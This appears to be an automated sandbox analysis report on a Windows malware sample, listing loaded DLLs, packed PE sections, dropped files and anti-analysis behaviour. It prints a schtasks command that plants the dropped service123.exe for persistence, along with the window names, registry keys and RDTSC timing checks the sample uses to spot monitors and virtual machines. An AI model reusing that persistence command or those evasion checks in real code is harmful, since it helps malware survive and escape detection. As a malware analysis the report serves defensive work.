Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: file.exe Static file information: File size 4380672 > 1048576
Source: file.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x277800
Source: file.exe Static PE information: Raw size of zxydtulm is bigger than: 0x100000 < 0x1b2400
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_004F8230 LoadLibraryA,GetProcAddress,FreeLibrary,ResetEvent,GetLastError, 8_2_004F8230
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x439f3e should be: 0x431e44
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: zxydtulm
Source: file.exe Static PE information: section name: buxvmaas
Source: file.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: unmYCIPOHmXNjqOesrEy.dll.0.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_004FA499 push es; iretd 8_2_004FA694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BE12BF0 push eax; mov dword ptr [esp], ebx 8_2_6BE12F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BE12BF0 push edx; mov dword ptr [esp], ebx 8_2_6BE12F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BE0EAB0 push eax; mov dword ptr [esp], ebx 8_2_6BE0EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDE2AAC push edx; mov dword ptr [esp], ebx 8_2_6BDE2AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDE0AA2 push eax; mov dword ptr [esp], ebx 8_2_6BDE0AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDF8AA0 push eax; mov dword ptr [esp], ebx 8_2_6BDF909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDF8A39 push eax; mov dword ptr [esp], ebx 8_2_6BDF8A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDDA947 push eax; mov dword ptr [esp], ebx 8_2_6BDDA95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDF4FED push ecx; mov dword ptr [esp], ebx 8_2_6BDF5030
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDF4FEB push ecx; mov dword ptr [esp], ebx 8_2_6BDF5030
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDF6F29 push ecx; mov dword ptr [esp], ebx 8_2_6BDF6F64
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDF6F25 push ecx; mov dword ptr [esp], ebx 8_2_6BDF6F64
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDF6F21 push ecx; mov dword ptr [esp], ebx 8_2_6BDF6F64
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDD8E7A push edx; mov dword ptr [esp], ebx 8_2_6BDD8E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDE4E31 push eax; mov dword ptr [esp], ebx 8_2_6BDE4E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BE0ED10 push eax; mov dword ptr [esp], ebx 8_2_6BE0EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BE40C30 push eax; mov dword ptr [esp], edi 8_2_6BE40DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDE4325 push ecx; mov dword ptr [esp], ebx 8_2_6BDE4339
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDB62E8 push eax; mov dword ptr [esp], ebx 8_2_6BE66622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDB6253 push eax; mov dword ptr [esp], ebx 8_2_6BE66AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDB6253 push edx; mov dword ptr [esp], edi 8_2_6BE66B36
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDD01D8 push eax; mov dword ptr [esp], ebx 8_2_6BDD0204
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDD01D4 push eax; mov dword ptr [esp], ebx 8_2_6BDD0204
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDD01D6 push eax; mov dword ptr [esp], ebx 8_2_6BDD0204
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDD01D2 push eax; mov dword ptr [esp], ebx 8_2_6BDD0204
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDD01CE push eax; mov dword ptr [esp], ebx 8_2_6BDD0204
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDF611A push eax; mov dword ptr [esp], esi 8_2_6BDF612B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDAE0D0 push eax; mov dword ptr [esp], ebx 8_2_6BE66AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDAE0D0 push edx; mov dword ptr [esp], edi 8_2_6BE66B36
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDF808A push eax; mov dword ptr [esp], ebx 8_2_6BDF809B
Source: file.exe Static PE information: section name: zxydtulm entropy: 7.9543015018442835
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\unmYCIPOHmXNjqOesrEy.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Found stalling execution ending in API Sleep call
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 865155 second address: 86515B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86515B second address: 86495F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B437h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FF7D4C1B435h 0x0000000f push dword ptr [ebp+122D1479h] 0x00000015 clc 0x00000016 jnp 00007FF7D4C1B42Ch 0x0000001c call dword ptr [ebp+122D18C6h] 0x00000022 pushad 0x00000023 or dword ptr [ebp+122D365Eh], esi 0x00000029 xor eax, eax 0x0000002b je 00007FF7D4C1B432h 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 jc 00007FF7D4C1B437h 0x0000003b js 00007FF7D4C1B431h 0x00000041 jmp 00007FF7D4C1B42Bh 0x00000046 xor dword ptr [ebp+122D1A72h], edi 0x0000004c mov dword ptr [ebp+122D2C73h], eax 0x00000052 add dword ptr [ebp+122D365Eh], eax 0x00000058 add dword ptr [ebp+122D180Eh], esi 0x0000005e mov esi, 0000003Ch 0x00000063 jne 00007FF7D4C1B427h 0x00000069 add esi, dword ptr [esp+24h] 0x0000006d jne 00007FF7D4C1B427h 0x00000073 lodsw 0x00000075 xor dword ptr [ebp+122D365Eh], ebx 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f sub dword ptr [ebp+122D1A72h], ecx 0x00000085 mov ebx, dword ptr [esp+24h] 0x00000089 add dword ptr [ebp+122D1B6Bh], edx 0x0000008f push eax 0x00000090 jnp 00007FF7D4C1B447h 0x00000096 pushad 0x00000097 push eax 0x00000098 push edx 0x00000099 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CA406 second address: 9CA40C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CA40C second address: 9CA414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CA414 second address: 9CA418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CA418 second address: 9CA42E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B432h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DBAFA second address: 9DBB00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DBDEF second address: 9DBDF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF7D4C1B426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DBF40 second address: 9DBF5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DBF5F second address: 9DBF99 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF7D4C1B426h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF7D4C1B434h 0x0000001a jmp 00007FF7D4C1B431h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DBF99 second address: 9DBF9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DBF9F second address: 9DBFA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DC0E8 second address: 9DC114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jns 00007FF7D4C1B3AEh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF7D4C1B3AAh 0x00000013 jo 00007FF7D4C1B3ACh 0x00000019 jp 00007FF7D4C1B3A6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DC114 second address: 9DC12E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7D4C1B430h 0x00000009 jbe 00007FF7D4C1B426h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DC12E second address: 9DC142 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF7D4C1B3A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jo 00007FF7D4C1B3A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DEB10 second address: 9DEB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FF7D4C1B437h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007FF7D4C1B437h 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 jc 00007FF7D4C1B426h 0x0000001f popad 0x00000020 popad 0x00000021 mov eax, dword ptr [eax] 0x00000023 jp 00007FF7D4C1B42Eh 0x00000029 push edi 0x0000002a jo 00007FF7D4C1B426h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DEB6F second address: 9DEB75 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DEBFB second address: 9DECC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jg 00007FF7D4C1B426h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f movsx edi, cx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007FF7D4C1B428h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e jg 00007FF7D4C1B43Eh 0x00000034 sbb dh, FFFFFFE3h 0x00000037 push 60285FE5h 0x0000003c push ecx 0x0000003d jns 00007FF7D4C1B42Ch 0x00000043 pop ecx 0x00000044 xor dword ptr [esp], 60285F65h 0x0000004b push 00000003h 0x0000004d push 00000000h 0x0000004f sub edx, 3422F85Fh 0x00000055 push 00000003h 0x00000057 jp 00007FF7D4C1B42Ch 0x0000005d mov dword ptr [ebp+122D357Ah], eax 0x00000063 push B4D59E87h 0x00000068 js 00007FF7D4C1B42Ah 0x0000006e xor dword ptr [esp], 74D59E87h 0x00000075 xor dx, CA32h 0x0000007a lea ebx, dword ptr [ebp+1244DA4Bh] 0x00000080 xor ecx, dword ptr [ebp+122D3750h] 0x00000086 xchg eax, ebx 0x00000087 push eax 0x00000088 push edx 0x00000089 jmp 00007FF7D4C1B438h 0x0000008e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DECC7 second address: 9DECDD instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF7D4C1B3ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DECDD second address: 9DECE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DECE1 second address: 9DECF3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF7D4C1B3A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FF7D4C1B3A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DED9B second address: 9DEE3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B438h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FF7D4C1B42Ch 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jng 00007FF7D4C1B42Eh 0x0000001a jne 00007FF7D4C1B428h 0x00000020 pop eax 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007FF7D4C1B428h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 00000017h 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b mov di, CC9Bh 0x0000003f push 00000003h 0x00000041 mov dword ptr [ebp+122D211Fh], ecx 0x00000047 push 00000000h 0x00000049 jne 00007FF7D4C1B42Ch 0x0000004f push 00000003h 0x00000051 mov si, di 0x00000054 call 00007FF7D4C1B429h 0x00000059 jmp 00007FF7D4C1B42Ch 0x0000005e push eax 0x0000005f pushad 0x00000060 jnc 00007FF7D4C1B42Ch 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DEF70 second address: 9DEF76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DEF76 second address: 9DEF7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DEF7A second address: 9DEF7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
